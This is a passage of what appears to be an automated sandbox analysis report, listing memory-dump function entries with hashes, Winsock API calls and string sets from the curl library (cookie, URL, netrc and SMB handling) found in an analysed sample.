                                       • Associated: 00000005.00000002.1427077219.000000000181B000.00000080.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_c00000_xXe4fTmV2h.jbxd
                                      Similarity
                                      • API ID: socket
                                      • String ID:
                                      • API String ID: 98920635-0
                                      • Opcode ID: f17d028e791bd8040e94f867168e3b55f6c28bf03ea2328056f6d14dde0ce8a7
                                      • Instruction ID: 9eba6902a4bb4ab9aca96d0f266c105838fc6d18bb70339b8fd3d9674fe8471f
                                      • Opcode Fuzzy Hash: f17d028e791bd8040e94f867168e3b55f6c28bf03ea2328056f6d14dde0ce8a7
                                      • Instruction Fuzzy Hash: 3FE06DB2A082216BC610CA48E844EABF369EFC4B20F054A0DF86463214C370EC408BE2
                                      APIs
                                      • closesocket.WS2_32(?,00CC9422,?,?,?,?,?,?,?,?,?,?,?,00CB3377,01094C60,00000000), ref: 00CCB04D
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1426008642.0000000000C01000.00000040.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                                       • Associated: 00000005.00000002.1425991500.0000000000C00000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426008642.00000000012D7000.00000040.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426008642.00000000012D9000.00000040.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426543785.00000000012DC000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426566082.00000000012DE000.00000040.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426566082.0000000001455000.00000040.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426566082.000000000156E000.00000040.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426566082.0000000001571000.00000040.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426566082.000000000164F000.00000040.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426566082.0000000001658000.00000040.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426566082.0000000001667000.00000040.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426906163.0000000001668000.00000080.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1427051261.0000000001819000.00000040.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1427077219.000000000181B000.00000080.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_c00000_xXe4fTmV2h.jbxd
                                      Similarity
                                      • API ID: closesocket
                                      • String ID:
                                      • API String ID: 2781271927-0
                                      • Opcode ID: cff26fdd484b361571a05a9ea2e11151c2ec08a931a7ba85881712463a1b8fdd
                                      • Instruction ID: 9584b2d60eedb98c75161b9b5e69fe85d0af30f38ed21c0cb18523cbcd2387c1
                                      • Opcode Fuzzy Hash: cff26fdd484b361571a05a9ea2e11151c2ec08a931a7ba85881712463a1b8fdd
                                      • Instruction Fuzzy Hash: 36D0C27430020157CA209A94C985F57B26B7FD0310FA9CB6CF03C4A554C73BCD478A01
                                      APIs
                                      • ioctlsocket.WS2_32(?,8004667E,?,?,00C3AF56,?,00000001), ref: 00C667FC
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1426008642.0000000000C01000.00000040.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                                       • Associated: 00000005.00000002.1425991500.0000000000C00000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426008642.00000000012D7000.00000040.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426008642.00000000012D9000.00000040.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426543785.00000000012DC000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426566082.00000000012DE000.00000040.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426566082.0000000001455000.00000040.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426566082.000000000156E000.00000040.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426566082.0000000001571000.00000040.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426566082.000000000164F000.00000040.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426566082.0000000001658000.00000040.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426566082.0000000001667000.00000040.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426906163.0000000001668000.00000080.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1427051261.0000000001819000.00000040.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1427077219.000000000181B000.00000080.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_c00000_xXe4fTmV2h.jbxd
                                      Similarity
                                      • API ID: ioctlsocket
                                      • String ID:
                                      • API String ID: 3577187118-0
                                      • Opcode ID: e2e1976e7aa696d8f1bdba17588b8d0c4f881f40c5308149a345eed4947ecea7
                                      • Instruction ID: 138fa63837c4d5d8309e9c11fbf541c660f582e4033b569c2718004ce565f68b
                                      • Opcode Fuzzy Hash: e2e1976e7aa696d8f1bdba17588b8d0c4f881f40c5308149a345eed4947ecea7
                                      • Instruction Fuzzy Hash: BDC080F511C101BFC70C8724D855B2F7BD8DB45355F01581CB046C11C0EA309994CF1B
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1426008642.0000000000C01000.00000040.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                                       • Associated: 00000005.00000002.1425991500.0000000000C00000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426008642.00000000012D7000.00000040.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426008642.00000000012D9000.00000040.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426543785.00000000012DC000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426566082.00000000012DE000.00000040.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426566082.0000000001455000.00000040.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426566082.000000000156E000.00000040.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426566082.0000000001571000.00000040.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426566082.000000000164F000.00000040.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426566082.0000000001658000.00000040.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426566082.0000000001667000.00000040.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426906163.0000000001668000.00000080.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1427051261.0000000001819000.00000040.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1427077219.000000000181B000.00000080.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_c00000_xXe4fTmV2h.jbxd
                                      Similarity
                                      • API ID: CloseHandle
                                      • String ID:
                                      • API String ID: 2962429428-0
                                      • Opcode ID: d286fd41005bf86719337888b74faebbc1712061b49bf40cf20ba2a25d4f893d
                                      • Instruction ID: 56fe54123b750a6072d44558a8c218460c9606abe57c301681075d12ba4c8914
                                      • Opcode Fuzzy Hash: d286fd41005bf86719337888b74faebbc1712061b49bf40cf20ba2a25d4f893d
                                      • Instruction Fuzzy Hash: 7B3192B49093159FCB10FFB8C5896AEBBF4AF44344F008969E8D9A7340E7349A45DF92
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1426008642.0000000000C01000.00000040.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_c00000_xXe4fTmV2h.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: #HttpOnly_$%s cookie %s="%s" for domain %s, path %s, expire %lld$;=$;$=$Added$FALSE$Replaced$TRUE$__Host-$__Secure-$cookie '%s' dropped, domain '%s' must not set cookies for '%s'$cookie '%s' for domain '%s' dropped, would overlay an existing cookie$cookie contains TAB, dropping$cookie.c$domain$expires$httponly$invalid octets in name/value, cookie dropped$libpsl problem, rejecting cookie for satety$max-age$oversized cookie dropped, name/val %zu + %zu bytes$path$secure$skipped cookie with bad tailmatch domain: %s$version
                                      • API String ID: 0-1371176463
                                      • Opcode ID: eb7446ccb6ca88cf2c7bb66673dd35ff7338ae22804eac3f33297a1afd928bb3
                                      • Instruction ID: c4778f2e49de526e89f48530fa505178558e03c2617a96c6c27ff57503bb1316
                                      • Opcode Fuzzy Hash: eb7446ccb6ca88cf2c7bb66673dd35ff7338ae22804eac3f33297a1afd928bb3
                                      • Instruction Fuzzy Hash: D6B23770E08300ABEB24AA25DC47B767BD5BF94304F48452CFC999B292E771EE44E751
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1426008642.0000000000C01000.00000040.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_c00000_xXe4fTmV2h.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: %3lld %s %3lld %s %3lld %s %s %s %s %s %s %s$ %% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed$%2lld:%02lld:%02lld$%3lldd %02lldh$%7lldd$** Resuming transfer from byte position %lld$--:-$--:-$--:-$-:--$-:--$-:--$Callback aborted
                                      • API String ID: 0-122532811
                                      • Opcode ID: faba46e4eae0e1b9cc3ea7edf912851641c381d0868f081adcee359d5cccab65
                                      • Instruction ID: 6acb0db5008ed13a8fb87fbbc9c517c613295a440ec741233fca6eafad43298c
                                      • Opcode Fuzzy Hash: faba46e4eae0e1b9cc3ea7edf912851641c381d0868f081adcee359d5cccab65
                                      • Instruction Fuzzy Hash: A4421771B08700AFD708DE28CC41BABB7EAEFC5700F048A2CF55997381D775A9559B92
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1426008642.0000000000C01000.00000040.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_c00000_xXe4fTmV2h.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Apr$Aug$Dec$Feb$Jan$Jul$Jun$Mar$May$Nov$Oct$Sep
                                      • API String ID: 0-3977460686
                                      • Opcode ID: fc72cbbb5a425df7a91be7376d79976227fc0f475e80546c84eeb3b0ed8420e5
                                      • Instruction ID: 1a5346afabceaaf7c6b48f0037cd9a39021a6ddeaf9525882e3df55542eaacda
                                      • Opcode Fuzzy Hash: fc72cbbb5a425df7a91be7376d79976227fc0f475e80546c84eeb3b0ed8420e5
                                      • Instruction Fuzzy Hash: E1326BB1A083014BC728AF299C4139AB7D69F87324F15472DF9B58B3D1E734DAC5A782
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1426008642.0000000000C01000.00000040.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_c00000_xXe4fTmV2h.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: -vc$ans$ate$attempts$ndot$out$retr$retr$rota$time$use-$usev
                                      • API String ID: 0-1574211403
                                      • Opcode ID: e8d05c473407284f50be4db812dd8f5974ff4c49030f4acc12e3b9cf301fa82e
                                      • Instruction ID: fa59fa4d8d40ce2fd85ab8331ced4571ac5cc153ef00203104184d1a15903e29
                                      • Opcode Fuzzy Hash: e8d05c473407284f50be4db812dd8f5974ff4c49030f4acc12e3b9cf301fa82e
                                      • Instruction Fuzzy Hash: CA6117B5E0830067EB54A620EC42FBBB699DB90304F04843DFD4F96293FA71DE049293
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1426008642.0000000000C01000.00000040.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_c00000_xXe4fTmV2h.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: %.*s%%25%s]$%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s$%s://$:;@?+$file$file://%s%s%s$https$urlapi.c$xn--
                                      • API String ID: 0-1914377741
                                      • Opcode ID: fcab4cc6a418ed59ddc136ff5be332c3a6080912191c42bcffdf1d570a67dc09
                                      • Instruction ID: 556807b365bc1f4a5019ffc1a3358d6d5c223ea4b3dc1ebb9271a626de2ccfa5
                                      • Opcode Fuzzy Hash: fcab4cc6a418ed59ddc136ff5be332c3a6080912191c42bcffdf1d570a67dc09
                                      • Instruction Fuzzy Hash: A972AD30A08B519FE7359A28E5467A7B7D2AF90340F08C62CEC945B693E7B6DEC4C741
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1426008642.0000000000C01000.00000040.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_c00000_xXe4fTmV2h.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: %2lld.%0lldG$%2lld.%0lldM$%4lldG$%4lldM$%4lldP$%4lldT$%4lldk$%5lld
                                      • API String ID: 0-3476178709
                                      • Opcode ID: 26100d8cfc36ed418aa4ee2e8dc6d77b8e12a6c2afb98d218615f6c4ff2d68be
                                      • Instruction ID: 9690aaf03e7b43013841aeb0d74a1f1582ad280e2e8d755fe03547fcdada1402
                                      • Opcode Fuzzy Hash: 26100d8cfc36ed418aa4ee2e8dc6d77b8e12a6c2afb98d218615f6c4ff2d68be
                                      • Instruction Fuzzy Hash: B731A973B54A45BAF72C200ADC86F7E105BC3C6B10F6EC23EB5169B2C1D8F55D416265
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1426008642.0000000000C01000.00000040.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_c00000_xXe4fTmV2h.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: $.$;$?$?$xn--$xn--
                                      • API String ID: 0-543057197
                                      • Opcode ID: 5f951194c147b677c80f6957897104b142f474ca8f32357b884bb90262f21c76
                                      • Instruction ID: 5badd00eb5b3eb625d79de1ddcccf4f930b2a13d5c10d635ff1a0f8535c748fa
                                      • Opcode Fuzzy Hash: 5f951194c147b677c80f6957897104b142f474ca8f32357b884bb90262f21c76
                                      • Instruction Fuzzy Hash: 912227B2A04301ABEB209B24DC41F6F77E6AF91308F18443DF99993292E735DE06D752
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1426008642.0000000000C01000.00000040.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_c00000_xXe4fTmV2h.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: $d$nil)
                                      • API String ID: 0-394766432
                                      • Opcode ID: 2b5e348bf7078310c947f685da47d145bd5f80a340c8d23ac4f7254f388a8ad7
                                      • Instruction ID: a6e97b185d1669e3d5290b5491b6f76445dcc414543fc1ca239a9dd5a0918dbc
                                      • Opcode Fuzzy Hash: 2b5e348bf7078310c947f685da47d145bd5f80a340c8d23ac4f7254f388a8ad7
                                      • Instruction Fuzzy Hash: 31139E71A083418FD720EF28C4807AABBE1BFC9364F14492DE9959B361D775EC49EB42
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1426008642.0000000000C01000.00000040.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_c00000_xXe4fTmV2h.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
                                      • API String ID: 0-2555271450
                                      • Opcode ID: 35d24b5713f12890e71ed8e8ce46434b882b839f2ca34f5df996aed9c2107f13
                                      • Instruction ID: 2403d77990643a0ada776a08f62f35c3bc475d884dd42764a335756e4d3df648
                                      • Opcode Fuzzy Hash: 35d24b5713f12890e71ed8e8ce46434b882b839f2ca34f5df996aed9c2107f13
                                      • Instruction Fuzzy Hash: 44C26A71A087418FD718CF29C49066AB7E2EFC9314F15CA2DE8A99B395D730ED45CB82
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1426008642.0000000000C01000.00000040.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                                      • Associated: 00000005.00000002.1425991500.0000000000C00000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.00000000012D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.00000000012D9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426543785.00000000012DC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.00000000012DE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001455000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.000000000156E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001571000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.000000000164F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001658000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001667000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426906163.0000000001668000.00000080.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1427051261.0000000001819000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1427077219.000000000181B000.00000080.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_c00000_xXe4fTmV2h.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
                                      • API String ID: 0-2555271450
                                      • Opcode ID: 696de96e9e2744e91a386e1da4a09045468765aae18a3ca6a9f200f10a10a62e
                                      • Instruction ID: ba1cf14c74a1ec769df7f3a706a562f5db999010a951e3ef97aec8d87acfcabe
                                      • Opcode Fuzzy Hash: 696de96e9e2744e91a386e1da4a09045468765aae18a3ca6a9f200f10a10a62e
                                      • Instruction Fuzzy Hash: 87829E71A083019FD724CE29C88072BB7E1AFC9764F188A2DF9A9972D1D730DD46DB52
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1426008642.0000000000C01000.00000040.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                                      • Associated: 00000005.00000002.1425991500.0000000000C00000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.00000000012D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.00000000012D9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426543785.00000000012DC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.00000000012DE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001455000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.000000000156E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001571000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.000000000164F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001658000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001667000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426906163.0000000001668000.00000080.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1427051261.0000000001819000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1427077219.000000000181B000.00000080.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_c00000_xXe4fTmV2h.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: default$login$macdef$machine$netrc.c$password
                                      • API String ID: 0-1043775505
                                      • Opcode ID: b5fd01ddc80f2e41356dab255d3d809c0667a93f72e5357f07089f56035013f2
                                      • Instruction ID: a74c1dfdefed7a624ed6f2b3cc35aec325ac2f24d57a6f4adec0b1aacdc73b73
                                      • Opcode Fuzzy Hash: b5fd01ddc80f2e41356dab255d3d809c0667a93f72e5357f07089f56035013f2
                                      • Instruction Fuzzy Hash: 64E1137090C351ABE7309F21D8D576B7BD4AF81708F18482CF89557392E3B5DA48DBA2
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1426008642.0000000000C01000.00000040.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                                      • Associated: 00000005.00000002.1425991500.0000000000C00000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.00000000012D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.00000000012D9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426543785.00000000012DC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.00000000012DE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001455000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.000000000156E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001571000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.000000000164F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001658000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001667000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426906163.0000000001668000.00000080.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1427051261.0000000001819000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1427077219.000000000181B000.00000080.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_c00000_xXe4fTmV2h.jbxd
                                      Similarity
                                      • API ID: FreeTable
                                      • String ID: 127.0.0.1$::1
                                      • API String ID: 3582546490-3302937015
                                      • Opcode ID: 99cc76198ad653838e5bad8fed6629eec16226b5dd57fef236943d4d7268946e
                                      • Instruction ID: 87e1efb3b3183e89d1d4ae4ae06d6cd4ce29d7e869cf6abf3428a0ea9a944114
                                      • Opcode Fuzzy Hash: 99cc76198ad653838e5bad8fed6629eec16226b5dd57fef236943d4d7268946e
                                      • Instruction Fuzzy Hash: D1A1C271C043829BE710DF25C849B6AB7E0EF95300F19962DF8998B261F770EE90D792
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1426008642.0000000000C01000.00000040.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                                      • Associated: 00000005.00000002.1425991500.0000000000C00000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.00000000012D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.00000000012D9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426543785.00000000012DC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.00000000012DE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001455000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.000000000156E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001571000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.000000000164F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001658000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001667000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426906163.0000000001668000.00000080.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1427051261.0000000001819000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1427077219.000000000181B000.00000080.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_c00000_xXe4fTmV2h.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: ????$Invalid input packet$SMB upload needs to know the size up front$\$\\
                                      • API String ID: 0-4201740241
                                      • Opcode ID: 020991ec5eda7e5b29351a0658733cd0d4e10f1e6241cbbff850f1e4b22dd9e5
                                      • Instruction ID: 8337d26c851fc4c1b350ac599e57ea448fb56018fbf6adaa1f359f5b77190b79
                                      • Opcode Fuzzy Hash: 020991ec5eda7e5b29351a0658733cd0d4e10f1e6241cbbff850f1e4b22dd9e5
                                      • Instruction Fuzzy Hash: 4F62FFB0914741DBD724CF24C8907AAB7E4FF98304F04862DE89D9B352E774EA94CB96
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1426008642.0000000000C01000.00000040.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                                      • Associated: 00000005.00000002.1425991500.0000000000C00000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.00000000012D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.00000000012D9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426543785.00000000012DC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.00000000012DE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001455000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.000000000156E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001571000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.000000000164F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001658000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001667000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426906163.0000000001668000.00000080.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1427051261.0000000001819000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1427077219.000000000181B000.00000080.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_c00000_xXe4fTmV2h.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: .DAFSA@PSL_$===BEGIN ICANN DOMAINS===$===BEGIN PRIVATE DOMAINS===$===END ICANN DOMAINS===$===END PRIVATE DOMAINS===
                                      • API String ID: 0-2839762339
                                      • Opcode ID: 2426e223a22e748c348e485cf8446ddcd3c57f97db54076f63d72098edb64e39
                                      • Instruction ID: c64d738ae024df4efaab1e1b93d7ee041980ef9246227994db6b0a7bda0fae8b
                                      • Opcode Fuzzy Hash: 2426e223a22e748c348e485cf8446ddcd3c57f97db54076f63d72098edb64e39
